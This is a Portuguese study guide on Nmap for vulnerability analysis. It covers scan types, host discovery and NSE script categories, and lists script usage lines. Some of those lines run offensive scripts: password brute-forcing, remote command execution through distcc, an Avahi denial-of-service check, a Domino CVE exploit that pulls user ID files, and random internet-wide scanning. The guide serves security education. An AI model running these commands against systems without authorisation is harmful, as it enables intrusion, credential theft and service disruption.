Segundo seu idealizador (Fyodor), ele foi projetado para examinar rapidamente, grandes redes, mas funciona bem se você deseja examinar uma única maquina. Com a facilidade de rodar em diversos sistemas operacionais, tais como Windows, Linux e demais sistemas do mercado o Nmap tem sido um grande aliado dos administradores de redes e analistas de segurança.

Fundamentos do escaneamento de portas Embora o Nmap tenha crescido em funcionalidade ao longo dos anos, ele começou como um eficiente scanner de portas, e essa permanece sua função principal. O simples comando nmap escaneia mais de 1600 portas TCP no host . Embora muitos scanner de portas tenham tradicionalmente agrupado todas as portas nos estados aberto ou fechado, o Nmap é muito mais granular. Ele divide as portas em seis estados: aberto(open), fechado(closed),filtrado(filtered), não-filtrado(unfiltered), open|filtered, ou closed|filtered. Esses estados não são propriedades intrínsecas da porta, mas descrevem como o Nmap as vê. Por exemplo, um scan do Nmap da mesma rede como alvo pode mostrar a porta 135/tcp como aberta,


2 24


enquanto um scan ao mesmo tempo com as mesmas opções, à partir da Internet poderia mostrar essa porta como filtrada.

Os seis estados de porta reconhecidos pelo Nmap Aberto (open) : Quando uma aplicação está em execução e aceitando conexões TCP ou pacotes UDP nesta porta. É exatamente esse o objetivo de Invasores e profissionais de avaliação de segurança. Encontrar portas abertas para exploração. Já a função dos administradores é de fechar ou proteger com firewalls, mais sem torná-las indisponíveis para os usuários legítimos.

Fechado (closed) : Uma porta fechada está acessível (ela recebe e responde a pacotes de sondagens do Nmap), mas não há nenhuma aplicação ouvindo nela. Elas podem ser úteis para mostrar que uma máquina está ligada. Nesse caso daria pra descobrir o sistema operacional e outras informações sobre o alvo

Filtrado (filtered) : Quando o Nmap não consegue determinar se a porta está aberta porque uma filtragem de pacotes impede que as sondagens alcancem a porta. Esse filtros podem ser implementados com firewalls dedicado ou de host e roteadores.


2 25


Não-filtrado (unfiltered) : O estado não-filtrado significa que uma porta está acessível, mas que o Nmap é incapaz de determinar se ela está aberta ou fechada.

open|filtered : O Nmap coloca portas neste estado quando é incapaz de determinar se uma porta está aberta ou filtrada.

closed|filtered: Este estado é usado pelo Nmap pra informar que não foi incapaz de determinar se uma porta está fechada ou filtrada.

Comunicação TCP TCP Flags de comunicação: As c omunicações padrão TCP são controladas por bandeiras (flags) no cabeçalho do pacote TCP. Os sinalizadores são: Synchronize: Sincronizar - também chamado de "SYN" Usado para iniciar uma conexão entre os hosts.

Acknowledgement: Reconhecimento - também chamado de "ACK" -Utilizadas para estabelecer uma conexão entre os hosts.

Push: Push - "PSH" - Instrui o sistema de recepção para enviar todos os dados em buffer imediatamente. Urgent: Urgente "URG" Estado que os dados contidos no pacote deve ser processado imediatamente. Finish: Concluir, também chamado de "FIN", Diz ao sistema remoto que nao ha mais nada a transmitir. Reset: Reset, também chamado de "RST", Também é usado para retomar uma conexão.


2 26


Ex: Three Way Handshake Computer A

Computer B

192.168.0.2:2342 <---syn--->192.168.0.3:80 192.168.0.2:2342 <---syn/ack--->192.168.0.3:80 192.168.0.2:2342<---ack--->192.168.0.3:80

Conexão estabelecida O Computador A (192.168.1.2) inicia uma conexão com o servidor (192.168.1.3), através de um pacote com apenas um conjunto sinalizador SYN. O servidor responde com um pacote com ambos os SYN e a flag ACK. Para a etapa final, o cliente responde de volta o servidor com um único pacote ACK. Se estas três etapas forem concluídas, sem complicação, então uma conexão TCP foi estabelecida entre o cliente e o servidor.

Técnicas de varredura com Nmap Serão citados de forma sucinta apenas alguns tipos de varredura para que possamos executar uma analise em nossos sistemas de forma efetiva e encontra as possíveis vulnerabilidades. Essas técnicas foram


2 27


extraídas da documentação oficial do Nmap e podem ser lidas por inteiro em no site oficial www.insecure.org ou adquirindo o livro oficial em www.lcm.com.br

-sS - scan TCP SYN : O scan SYN é a opção de scanner padrão e mais popular de todas.com ela você pode fazer escaneamento de milhares de portas por segundo em uma rede que não esteja bloqueada por filtros de segurança. Considerando que ela não completa uma conexão TCP. Você envia um pacote SYN, como se fosse abrir uma conexão real e então espera uma resposta. Um SYN/ACK que indica que a porta remota está ouvindo, caso venha um reset (RST ) ao invés do SYN/ACK ela não esta ouvindo. Já se nenhuma resposta for recebida, a porta será marcada como filtrada.

-sT - scan TCP connect : O método de scan TCP connect é padrão do TCP. É útil quando o usuário não tem privilégios para criar pacotes em estado bruto. Ao invés de criar pacotes em estado bruto, o Nmap pede ao sistema operacional para estabelecer uma conexão com a máquina e a porta alvos enviando uma chamada de sistema connect

-sU - scans UDP : O método de scan de UDP é ativado com a opção -sU. Ele pode ser combinado com algum tipo de escaneamento TCP como o scan SYN (-sS) para testar ambos protocolos ao mesmo


2 28


tempo. O scan UDP funciona enviando um cabeçalho UDP vazio para cada porta de destino. Se um erro ICMP de porta inalcançável for retornado, a porta está fechada. Outros erros do tipo inalcançável (tipo 3, códigos 1, 2, 9, 10, ou 13) marcam a porta como filtrada. Ocasionalmente um serviço irá responder com um pacote UDP, provando que está aberta. Se nenhuma resposta for recebida a porta é classificada como aberta|filtrada

-sN; -sF; -sX (scans TCP Null, FIN, e Xmas) : Esses três métodos exploram uma falha na RFC 793 do TCP para que traduz a diferença entre portas abertas e fechadas. Quando se escaneia sistemas padronizados com o texto desta RFC, qualquer pacote que não contenha os bits SYN, RST, ou ACK irá resultar em um RST como resposta se a porta estiver fechada, e nenhuma resposta se a porta estiver aberta. Contanto que nenhum desses três bits estejam incluídos, qualquer combinação dos outros três (FIN, PSH e URG) é válida. O Nmap explora isso com três tipos de scan: scan Null (-sN) Não marca nenhum bit (o cabeçalho de flag do tcp é 0). scan FIN (-sF) Marca apenas o bit FIN do TCP e scan Xmas(-sX) Marca as flags FIN, PSH e URG.


2 29


Esses três tipos de scan são exatamente os mesmos em termos de comportamento, exceto pelas flags TCP marcadas no pacotes de sondagem. Se um pacote RST for recebido, a porta é considerada fechada, e nenhuma resposta significa que está aberta|filtrada. A porta é marcada como filtrada se um erro ICMP do tipo inalcançável (tipo 3, código 1, 2, 3, 9, 10, ou 13) for recebido.

-sA - scan TCP ACK : Esse scan é um pouco diferente pelo porque ele nunca determina se uma porta está aberta ou aberta|filtrada). Ele é utilizado para mapear conjuntos de regras do firewall, determinando se eles são orientados à conexão ou não e quais portas estão filtradas.

-sW - scan da Janela TCP : Scan da Janela é a mesma coisa que scan ACK, exceto pelo fato de que ele explora um determinado detalhe da implementação de certos sistemas para diferenciar as portas abertas das fechadas.

Alguns exemplos práticos Stealth Scan Computer A

Computer B

192.168.0.2:2342 <---syn--->192.168.0.3:80


2 30


192.168.0.2:2342 <---syn/ack--->192.168.0.3:80 192.168.0.2:2342<---RST--->192.168.0.3:80 O cliente envia um unico pacote SYN para o servidor na porta escolhida de acordo com o serviço a ser utilizado. Se a porta estiver aberta, o servidor responde com um pacote SYN/ACK. Se o servidor responder com um pacote RST, é porque a porta remota está fechada. O cliente envia um pacotes RST para fechar a abertura antes que uma conexão possa ser estabelecido. Essa varredura também é conhecida como "half-open" scan.

Xmas Scan Computer A

Computer B

Xmas scan dirigida a uma porta aberta 192.168.5.92:4031 ---FIN/URG/PSH--->192. 168.5.110:23 192. 168.5.92:4031 <---NO RESPONSE---192. 168.5.110:23 Xmas scan dirigida a uma porta fechada 192. 168.5.92:4031 ---FIN/URG/PSH--->192. 168.5.110:23 192.5.5.92:4031<---RST/ACK---192.5.5.110:23


2 31


Nota: O Xmas scan só funciona se a implementação do sistema for desenvolvida de acordo com a RFC 793. E o Xmas scan não funcionará contra qualquer versão atual do Microsoft Windows. Pois a Microsoft nao segue a RFC 793 em sua implementação para o Windows. Se você tentar essa tecnica contra esses sistemas, vai receber em resposta. Todas as portas do host remoto estão fechadas.

FIN Scan Computer A

Computer B

Scan FIN dirigida a porta aberta 192.168.5.92:4031 <---FIN--->192.168.5.110:23 192.168.5.92:4031 <---NO RESPONSE--->192.168.5.110:23 Scan FIN dirigida a porta fechada 192.168.5.92:4031< ---FIN--->192.168.5.110:23 192.168.5.92:4031<---RST/ACK--->192.168.5.110:23 Nota: O scan FIN só funciona se a implementação do sistema for desenvolvida de acordo com a RFC 793. E não não vai funcionar contra qualquer versão atual do Microsoft Windows. Ele irá retornar a mesma resposta do Xmas Scan.


2 32


NULL Scan Computer A

Computer B

NULL scan dirigida a porta aberta 192.5.5.92:4031 <---NO FLAGS SET--->192.5.5.110:23 192.5.5.92:4031 <---NO RESPONSE--->192.5.5.110:23 NULL scan dirigida a porta fechada 192.5.5.92:4031 <---NO FLAGS SET--->192.5.5.110:23 192.5.5.92:4031<---RST/ACK--->192.5.5.110:23 Nota: NULL scan só funciona se a implementação do sistema for desenvolvida de acordo com a RFC 793 e seguirá a mesma regra para as duas técnicas anteriores.. Agora que temos uma boa ideia dos conceitos básicos de Nmap, vamos praticar um pouco. Encontre servidores web aleatoriamente com o comando #nmap -sS -PS80 -iR 0 -p80


2 33


Nesse exemplo o nmap vai varrer a internet em busca de servidores web. Essa não uma prática aconselhada porque demanda muito recurso de hardware e não define um objetivo.

Traceroute com nmap Em uma analise de vulnerabilidades, especificamente na parte de reconhecimento poderá haver necessidades de observação da quantidade de saltos que um pacote daria até chegar determinado alvo. Isso ganha mais importância ainda quando você precisa observar por onde esse pacote está passando, por quais roteadores, quem são o proprietários etc.


2 34


O comando de rede padrão no Windows é tracert e em Linux é traceroute, mas pra quem tem nmap não precisa se preocupar, pois ele traça rota com mais eficiência. nmap -PN -T4 --traceroute www.clubedohacker.com.br


2 35


No exemplo acima podemos ver a rota por onde passariam meus pacotes em uma tentativa de acesso a um dos meus sites. A tela foi recortada para melhor compreensão.

Exame de lista: -sL O exame de lista é uma forma interessante e muito útil pra você descobrir os alvos. Pois com essa técnica o namp lista cada host nas redes especificadas, sem enviar nenhum pacote ao host alvo. Por padrão o nmap faz também a resolução de DNS reverso nos hosts para descobrir os seus nomes. O nmap também irá relatar o número total de endereços IP no final. O exame de lista é um excelente cheque de sanidade para que você possa assegurar-se de que está com os endereços IP corretos para seus alvos, evitando assim a possibilidade de está analisando o alvo errado. Por exemplo, se os hosts simularem nomes de domínio que você não reconheça, valerá a pena investigar mais a fundo principalmente quando você está analisando hosts em rede corporativa. Esses cuidados vão evitar que você faça buscas em hosts de rede da empresa errada. Um bom exemplo de exame de lista seria: #nmap -sL www.clubedohacker.com.br


2 36


Exame por ping com nmap: -sP Essa opção diz ao nmap para realizar somente um exame por ping e depois exibir os hosts que responderem como disponíveis.


2 37


exemplo: #nmap -sP -T4 www.clubedohacker.com.br/24

No exemplo acima enviamos uma solicitação de eco de ICMP e um pacote TCP ACK para a porta 80. Observação se você tiver logado como usuário sem privilégios do unix e ou sem a biblioteca winpcap instalada no Windows você não poderá enviar esses pacotes crus, somente um pacote SYN é enviado. Nesses casos o pacote SYN é enviado usando-se uma chamada de conexão TCP do sistema à porta 80 do alvo.

Técnicas de descobertas de hosts A muito tempo atrás a descoberta de hosts era bem mais fácil, bastava um endereço IP registrado para um host ficar ativo, nesse caso enviaríamos um pacote ICMP de requisição de eco "ping" e era


2 38


só aguardar uma resposta. Os firewalls raramente bloqueavam essas requisições e a grande maioria das máquinas respondiam de maneira obediente, pois era uma exigência desde 1989 pela RFC 1122, que afirmava tacitamente "Todo host deverá implementar uma função servidora de eco ICMP que receba solicitações de eco e envie correspondente resposta de eco. Ex: #nmap -sP -PE -R -v eleicaosuja.com.br concerte.com.br adonelbezerra.com.br

- Aqui usamos um exemplo de ICMP puro do nmap em 3 sites de minha propriedade. As opções -sP -PE especificam um exemplo de ping ICMP puro.


2 39


-R diz ao nmap para realizar a resolução de DNS reverso em todos os hosts, mesmo os que estiverem fora do ar.

Ping por TCP SYN (-PS) A opção -PS envia um pacote TCP vazio, com o sinalizador SYN ligado. A porta padrão de destino é a 80, mas pode ser configurada outra porta na hora da compilação do nmap, (caso você tenha optado por utilizar o código fonte bruto). As mudanças pode ser feitas em DEFAULT_TCP_PROBE_PORT_SPEC no arquivo nmap.h Exemplo: -PS22,80,113,1050,35000 nos casos em que as provas serão executadas em cada porta em paralelo, o sinalizador SYN sugere ao sistema remoto que você está tentando estabelecer uma conexão. Normalmente a porta de destino estará fechada e um pacote RST será enviado de volta. Se a porta estiver aberta, o alvo dará o segundo passo de uma saudação TCP de três tempos, respondendo com um pacote TCP SYN/ACK. Nesse caso a sua máquina que está rodando o nmap irá cortar a conexão iniciada respondendo com um RST em vez de


2 40


enviar o pacote ACK que completaria a saudação de três tempos e estabeleceria a conexão completa. O mais importante nisso tudo é que o nmap não se preocupa se a porta está aberta ou fechada. Qualquer das respostas, seja RST ou SYN/ACK confirmará para o nmap que a máquina alvo está disponível. Exemplo: #nmap -sP -PE -R -v microsoft.com adonelbezerra.com.br google.com

Ping por TCP ACK: -PA + O ping por TCP ACK é similar ao ping por SYN, a diferença é que o sinalizador de TCP ACK está ligado, no lugar do sinalizador SYN. Um pacote ACK supõe está reconhecendo dados através de uma conexão TCP estabelecida, mas essa conexão não existe. Assim a máquina alvo deverá sempre responder com um pacote RST, revelando sua existência nesse processo. A opção -PA usa a mesma porta padrão que a porta SYN que nesse caso é a porta 80, mas também pode receber uma lista de portas de destino, no mesmo formato. A razão para se executar ambas as provas de ping por SYN e por ACK é maximizar as chances de ultrapassagem de algum firewalls que por ventura esteja de guarda.


2 41


A questão é que muitos administradores ainda configuram roteadores e firewalls simples para bloquear pacotes SYN que chegam, exceto por aqueles destinados a serviços públicos, como websites, servidores ftp, servidores de e-mail etc. Isto evita a chegada de outras conexões à empresa, mas permitem que os usuários façam conexões de saída livremente com a internet. ex: nmap -sP -PA www.eleicaosuja.com.br

Ping de UDP (-PU

2 42


A falta de uma resposta também é interpretada como alvo disponível, pois se uma porta aberta for alcançada, a maioria dos serviços simplesmente ignora o pacote vazio e falham em retornar qualquer resposta. É por isso que a porta padrão dessa técnica é a 31338, que é totalmente improvável de estar em uso. Umas das vantagens tipo de técnica é que ela dribla firewalls e filtros quando estão configurados pra filtrarem somente TCP.

Outros tipos de ping de ICMP (-PE, -PP, e - PM) Além dos tipos comuns de descoberta de máquina por TCP e UDP, o nmap pode enviar os pacotes padrões enviados pelo programa ping tradicional presente em todo sistema operacional. O nmap envia um pacote ICMP tipo 8 (requisição de eco) ao alvo, e aguarda por uma resposta de tipo 0 (resposta de eco). Muitos firewall bloqueiam estes tipos de pacotes para não responderem de acordo com a determinação da RFC 1122. É por isso que exames de ICMP raramente são confiáveis. Mas para administradores de sistemas que estão monitorando uma rede interna, esta pode ser uma abordagem muito eficiente. Bastando para isso usar a opção -PE para habilitar este comportamento de requisição de eco.


2 43


Embora a requisição de eco seja a consulta padrão do ping ICMP, o nmap não se limita a isso, ele vai alem do padrão do ICMP descrito na (RFC 792).

Ping de protocolo IP ( -PO Outra opção de descoberta de host é usando o ping de protocolo IP, que envia pacotes IP com número de protocolos especificado ajustado em seus cabeçalhos IP. A lista de protocolos usa o mesmo formato das listas de portas das opções de descoberta de host por TCP e UDP. Se nenhum protocolo for especificado, por padrão serão enviados múltiplos pacotes de IP para ICMP (protocolo 1), IGMP (protocolo 2) e IP- para IP (protocolo 4). Os protocolos padrão também pedem ser configurados durante a compilação do nmap alterando-se DEFAULT_PROTO_PROBE_PORT_SPEC no arquivo nmap.h. Este método de descoberta de host procura por qualquer resposta usando o mesmo protocolo como prova, ou mensagens de inalcançável do protocolo ICMP, o que significa que tal protocolo não é suportado pelo host de destino. E qualquer tipo de resposta significa que a máquina alvo está ativa.


2 44


Mecanismo de scripts do nmap Até aqui foi discutido item a item do nmap, é claro que ainda faltam muita coisa a ser explorada desse fabuloso scanner, se é que ele pode ser chamado de scanner com tantas funcionalidades. Aqui fecharemos com uma que eu considero das mais importantes, pois o mecanismo de script do namp é simplesmente extraordinário ao juntar cadeias de comandos e ao serem disparados ira nos retornar o resultado de forma extremamente fácil de interpretar. De forma pratica você pode selecionar um dos mais de 60 scripts em sua base e com atualização constante, de forma muito simples, assim como é simples de usar todo o nmap. Basta digitar -script = selecionar um script especifico

As categorias de scripts Os scripts NSE são definidos pela categoria a que pertencem, listei aqui as principais para melhor entendimento .

*auth = autenticação: - Esses scripts tentam descobrir credenciais de autenticação no sistema alvo, normalmente através de ataques de força bruta.


2 45


*discovery = descoberta: - Esses scripts tentam ativamente descobrir mais sobre a rede, consultando registros públicos, dispositivos habilitados ao SNMP, serviços de diretórios. Ex.1: html-title que obtém o titulo do caminho na raiz de um website. Ex.2:O smb-enumshares que enumera compartilhamentos do windows. Ex.3: snmpsysdescr que extrai detalhes do sistema através do SNMP.

*version = versão: - Os scripts nessa categoria especial são uma extensão da funcionalidade da detecção de versão e não podem ser selecionados explicitamente. Eles são selecionados para execução somente se detecção de versão (-sV) for solicitada. A saída deles não podem ser distinguidas da saída de detecção de versão e eles não produzem resultados de scripts de serviços ou de host. Ex: são o skypev-2-version, o pptp-version e o iax2-version.

*vuln = versão: -Estes scripts checam vulnerabilidades específicas conhecidas e, geralmente, só reportam resultados se elas forem encontradas. EX: realvnc-auth-bypass e o xampp-default-auth

*default = padrão: - Esses scripts são o conjunto padrão e são executados quando usamos as opções -sC ou -A, ao invés de listar os scripts com –script. Essa categoria pode ser especificada explicitamente, como qualquer outra, usando-se --script=default.


2 46


*external = externos: - Os srcipts desta categoria podem enviar dados a bases de dados de terceiros ou outros recursos de rede.

*intrusive = intrusivos: - Alguns scripts são muito intrusivos, porque usam recursos significativos no sistema remoto, podendo até derrubar o sistema ou serviço. Normalmente são percebidos facilmente como ataque pelos administradores.

*malware = - Estes scripts testam se a plataforma está infectada por malwares ou backdoors. Exemplos: o smtp-strangeport, que observa servidores SMTP rodando em números de portas incomuns e o authspoof que detecta servidores de simulação de identd que fornecem uma resposta falsa, antes mesmo de receberem uma consulta. De acordo com a documentação oficial do nmap: Esses comportamentos são interpretados como indicativos de infecções de malwares.

*safe = seguros : - Scripts que não foram projetados para derrubar serviços, usar grande quantidade de largura de banda da rede ou outros recursos, ou explorar brechas de segurança são categorizados como safe. Vamos a alguns exemplos práticos de utilização dos scripts do nmap. Primeiro analisaremos uma maquina protegida em relação a uma determinada vulnerabilidade.


2 47


Os resultados serão divididos em três telas distintas para que você possa analisar do inicio ao fim.

Nessa tela temos o comando bruto sendo executado. Onde nmap é a chamada padrão -v verbose serve para mostrar o resultado na tela -script para selecionar o script, smb para selecionar a categoria do script e por fim o script check-vulns para checar uma vulnerabilidade especifica e o alvo logo em seguida. Nesse caso o alvo poderia ser o seguimento de rede inteiro bastando para isso digitar 192.168.0.0/24.


2 48


Aqui nós temos a execução normal do script.


2 49


Nessa ultima tela temos o resultado final informando que apenas da possibilidade de outras vulnerabilidades, esse sistema não esta vulnerável nesse momento a esse problema especifico. Agora analisaremos uma maquina apontada pelo mesmo script do nmap como vulnerável.


2 50


os procedimentos usados anteriormente para testar a maquina que não estava vulnerável também foram utilizados aqui. A única diferença esta no resultado obtido.

Lista de scripts Localizar a sintaxe de utilização dos scripts do nmap, bem como sua localização é muito simples. A Localização é /usr/share/nmap/scripts Para melhor compreensão, estou copiando aqui as referencias e a sintaxe da maioria dos scripts disponíveis no NMAP. Claro que não estão todos relacionados, mais a grande maioria sim.


2 51


Lembre-se que analise de vulnerabilidade significa conhecimento amplo sobre o alvo e o NMAP é decisivo nesse aspecto, portanto, o domínio completo dessa ferramenta é fundamental.

"Legenda" @usage =(Sintaxe para utilização) description = (Descrição resumida do script)

description = Performs password guessing against Apple Filing Protocol (AFP). @usage nmap -p 548 --script afp-brute

description = Retrieves the authentication scheme and realm of an AJP service (Apache JServ Protocol) that requires authentication.

@usage -- nmap -p 8009 --script ajp-auth [--script-args ajpauth.path=/login]


2 52


description = Performs brute force passwords auditing against the Apache JServ protocol.

@usage nmap -p 8009 --script ajp-brute description = Performs a HEAD or GET request against either the root directory or any optional directory of an Apache JServ Protocol server and returns the server response headers.

@usage nmap -p 8009 --script ajp-headers

description = Discovers which options are supported by the AJP (Apache JServ Protocol) server by sending an OPTIONS request and lists potentially risky methods. http://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_ XST_%28OWASP-CM-008%29

@usage nmap -p 8009 --script ajp-methods

description = Requests a URI over the Apache JServ Protocol and displays the result (or stores it in a file). Different AJP


2 53


methods such as; GET, HEAD,TRACE, PUT or DELETE may be used.

@usage nmap -p 8009 --script ajp-request description = Gathers information (a list of all server properties) from an AMQP (advanced message queuing protocol) server. See http://www.rabbitmq.com/extensions.html for details on the server-properties field.

@usage nmap --script amqp-info -p5672

description = Maps IP addresses to autonomous system (AS) numbers.

@usage nmap --script asn-query [--script-args dns=] -- @args dns The address of a recursive nameserver to use (optional).

description = Performs brute force password auditing against the BackOrifice service. The backorifice- ww w. cl ub ed oh ack er .c om .b r 2 54 ADONEL BEZERRA GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES ............................................................................................................... brute.ports script argument is mandatory (it specifies ports to run the script against).

@usage nmap -sU --script backorifice-brute --script-args backorifice-brute.ports= -- @arg backorifice-brute.ports (mandatory) List of UDP ports to run the script against separated with "," ex. "U:31337,25252,151-222", "U:1024-1512"

description = Connects to a BackOrifice service and gathers information about the host and the BackOrifice service itself. The extracted host information includes basic system setup, list of running processes, network resources and shares.

@usage nmap --script backorifice-info --script-args backorificeinfo.password=

description = Queries a Bitcoin server for a list of known Bitcoin nodes


2 55


@usage nmap -p 8333 --script bitcoin-getaddr

description = Extracts version and node information from a Bitcoin server

@usage nmap -p 8333 --script bitcoin-info

description = Obtains information from a Bitcoin server by calling getinfo on its JSON-RPC interface.

@usage nmap

-p 8332 --script bitcoinrpc-info creds.global=:

--script-args

description = Discovers bittorrent peers sharing a file based on a usersupplied torrent file or magnet link. Peers implement the Bittorrent protocol and share the torrent, whereas the nodes (only shown if the include-nodes NSE argument is given) implement the DHT protocol and are used to track the peers.

@usage nmap

--script bittorrent-discovery --script-args newtargets,bittorrent-discovery.torrent=


2 56


description = Retrieves printer or scanner information from a remote device supporting the BJNP protocol. The protocol is known to be supported by network based Canon devices.

@usage sudo nmap -sU -p 8611,8612 --script bjnp-discover

description = Discovers servers supporting the ATA over Ethernet protocol. ATA over Ethernet is an ethernet protocol developed by the Brantley Coile Company and allows for simple, high-performance access to SATA drives over Ethernet.

@usage nmap --script broadcast-ataoe-discover -e

description= Attempts to discover hosts in the local network using the DNS Service Discovery protocol and sends a NULL UDP packet to each host to test if it is vulnerable to the Avahi NULL UDP packet denial of service (CVE-2011-1002). The

broadcast-avahi-dos.wait script argument specifies how many number of seconds to wait before a new attempt of host discovery.

Each host who does not respond to this second attempt will be considered vulnerable. Reference:


2 57


* http://avahi.org/ticket/325 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1002

@usage nmap --script=broadcast-avahi-dos

description = Attempts to discover Canon devices (Printers/Scanners) supporting the BJNP protocol by sending BJNP Discover requests to the network broadcast address for both ports associated with the protocol.

@usage nmap --script broadcast-bjnp-discover

description = Attempts to discover DB2 servers on the network by sending a broadcast request to port 523/udp.

@usage nmap --script db2-discover

description = Sends a DHCPv6 request (Solicit) to the DHCPv6 multicast address, parses the response, then extracts and


2 58


prints the address along with any options returned by the server.

@usage nmap -6 --script broadcast-dhcp6-discover description = Sends a DHCP request to the broadcast address (255.255.255.255) and reports the results. The script uses a static MAC address (DE:AD:CO:DE:CA:FE) while doing so in order to prevent scope exhaustion.

@usage sudo nmap --script broadcast-dhcp-discover

description= Attempts to discover hosts' services using the DNS Service Discovery protocol. It sends a multicast DNS-SD query and collects all the responses.

@usage nmap --script=broadcast-dns-service-discovery

description the = Listens for the client LAN broadcasts sync information that Dropbox.com every 20broadcasts seconds, then prints all the discovered client IP addresses, port numbers, version numbers, display names, and more.


2 59


@usage nmap --script=broadcast-dropbox-listener -- nmap --script=broadcast-dropbox-listener --script-args=newtargets -Pn description = Performs network discovery and routing information gathering through Cisco's Enhanced Interior Gateway Routing Protocol (EIGRP).

@usage nmap --script=broadcast-eigrp-discovery -- nmap --script=broadcast-eigrp-discovery -e wlan0 -- @args broadcast-eigrp-discovery.as Autonomous System value to announce on.

description = Discovers targets that have IGMP Multicast memberships and grabs interesting information.

@usage nmap --script broadcast-igmp-discovery nmap --script broadcast-igmp-discovery -e wlan0 nmap --script broadcast-igmp-discovery


2 60


script-args 'broadcast-igmp-discovery.version=all, broadcastigmp-discovery.timeout=3'

description = Discovers Microsoft SQL servers in the same broadcast domain.

@usage nmap --script broadcast-ms-sql-discover nmap --script broadcast-ms-sql-discover,ms-sql-info --scriptargs=newtargets

description = Attempts to discover master browsers and the domains they manage.

@usage nmap --script=broadcast-netbios-master-browser

description = Discovers EMC Networker backup software servers on a LAN by sending a network broadcast query.

@usage nmap --script broadcast-networker-discover

description = Sends a special broadcast probe to discover PCAnywhere hosts running on a LAN.


2 61


@usage nmap --script broadcast-pc-anywhere

description = Discovers PC-DUO remote control hosts and gateways running on a LAN by sending a special broadcast UDP probe.

@usage nmap --script broadcast-pc-duo

description = Discovers routers that are running PIM (Protocol Independent Multicast).

@usage nmap --script broadcast-pim-discovery

description = Discovers PPPoE (Point-to-Point Protocol over Ethernet) servers using the PPPoE Discovery protocol (PPPoED). PPPoE is an ethernet based protocol so the script has to know what ethernet interface to use for discovery. If no interface is specified, requests are sent out on all available interfaces.

@usage nmap --script broadcast-pppoe-discover


2 62


description= Discovers hosts and routing information from devices running RIPv2 on the LAN. It does so by sending a RIPv2 Request command and collects the responses from all devices responding to the request.

@usage nmap --script broadcast-rip-discover

description = Discovers hosts and routing information from devices running RIPng on the LAN by sending a broadcast RIPng Request command and collecting any responses.

@usage nmap --script broadcast-ripng-discover

description = Discovers Versant object databases using the broadcast srvloc protocol.

@usage nmap --script broadcast-versant-locate

description Wake-On-Lan = Wakes a remote packet.system up from sleep by sending a

@usage


2 63


nmap --script broadcast-wake-on-lan --script-args broadcastwake-on-lan.MAC='00:12:34:56:78:9A'

description = Retrieves a list of proxy servers on a LAN using the Web Proxy Autodiscovery Protocol (WPAD). It implements both the DHCP and DNS methods of doing so and starts by querying DHCP to get the address.

@usage nmap --script broadcast-wpad-discover

description = Uses a multicast query to discover devices supporting the Web Services Dynamic Discovery (WS-Discovery) protocol. It also attempts to locate any published Windows Communication Framework (WCF) web services (.NET 4.0 or later).

@usage sudo ./nmap --script broadcast-wsdd-discover

description Cassandra = Performs brute force password auditing against the database. For more information about Cassandra, see: http://cassandra.apache.org/


2 64


@usage nmap -p 9160 --script=cassandra-brute

description = Attempts to get basic info and server status from a Cassandra database. For more information about Cassandra, see: http://cassandra.apache.org/

@usage nmap -p 9160 --script=cassandra-info

description = Extracts a list of Citrix servers from the ICA Browser service.

@usage sudo ./nmap -sU --script=citrix-enum-servers -p 1604

description = Extracts the name of the server farm and member servers from Citrix XML service.

@usage nmap --script=citrix-enum-servers-xml -p 80,443,8080

description = Lists printers managed by the CUPS printing service.


2 65


@usage nmap -p 631 --script cups-info

description = Lists currently queued print jobs of the remote CUPS service grouped by printer.

@usage nmap -p 631 --script cups-queue-info

description = Performs brute force password auditing against CVS pserver authentication.

@usage nmap -p 2401 --script cvs-brute

description = Attempts to guess the name of the CVS repositories hosted on the remote server.

@usage nmap -p 2401 --script cvs-brute-repository


2 66


description = Connects to a dictionary server using the DICT protocol, runs the SHOW SERVER command, and displays the result. The DICT protocol is defined in RFC 2229 and is a protocol which allows a client to query a dictionary server for definitions from a set of natural language dictionary databases.

@usage nmap -p 2628 --script dict-info

description = Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.

@usage nmap -p 3632 --script distcc-exec --script-args="distccexec.cmd='id'"

description = Checks target IP addresses against multiple DNS antispam and open proxy blacklists and returns a list of services for which an IP has been flagged. Checks may be limited by service category (eg: SPAM, PROXY) or to a specific service name.

@usage nmap --script dns-blacklist --script-args='dns-blacklist.ip='


2 67


description =Performs DNS cache snooping against a DNS server.

@usage nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dnscache-snoop.mode=timed,dns-cachesnoop.domains={host1,host2,host3}'

description = Performs a domain lookup using the edns-client-subnet option which allows clients to specify the subnet that queries supposedly srcinate from. The script uses this option to supply a number of geographically distributed locations in an attempt to enumerate as many different address records as possible. The script also supports requests using a given subnet. http://tools.ietf.org/html/draft-vandergaast-edns-client-subnet-00

@usage nmap -sU -p 53 --script dns-client-subnet-scan --script-args

description = Tries to enumerate domain names from the DNS server that supports DNSSEC NSEC3 records. References: * http://dnscurve.org/nsec3walker.html

@usage nmap -sU -p 53 --script=dns-nsec3-enum --script-args dns-nsec3-enum.domains=example.com


2 68


@usage nmap -sSU -p 53 --script dns-nsec-enum --script-args dns-nsecenum.domains=example.com

description = Retrieves information from a DNS nameserver by requesting its nameserver ID (nsid) and asking for its id.server and version.bind values. This script performs the same queries as the following two dig commands: - dig CH TXT bind.version @target - dig +nsid CH TXT id.server @target References: [1]http://www.ietf.org/rfc/rfc5001.txt [2]http://www.ietf.org/rfc/rfc4892.txt

@usage nmap -sSU -p 53 --script dns-nsid

description= Attempts to discover target hosts' services using the DNS Service Discovery protocol.

@usage nmap --script=dns-service-discovery -p 5353


2 69


description = Enumerates various common service (SRV) records for a given domain name.

@usage nmap

--script dns-srv-enum --script-args enum.domain='example.com'"

"dns-srv-

description = Checks if the target IP range is part of a Zeus botnet by querying ZTDNS @ abuse.ch. Please review the following information before you start to scan: * https://zeustracker.abuse.ch/ztdns.php

@usage nmap -sn - PN --script=dns-zeustracker

description = Attempts to discover valid IBM Lotus Domino users and download their ID files by exploiting the CVE-20065835 vulnerability.

@usage nmap --script domino-enum-users -p 1352

description = Performs brute force password auditing against an iPhoto Library.


2 70


@usage nmap --script dpap-brute -p 8770

description = Performs password guessing against databases supporting the IBM DB2 protocol such as Informix, DB2 and Derby

@usage nmap -p 50000 --script drda-brute

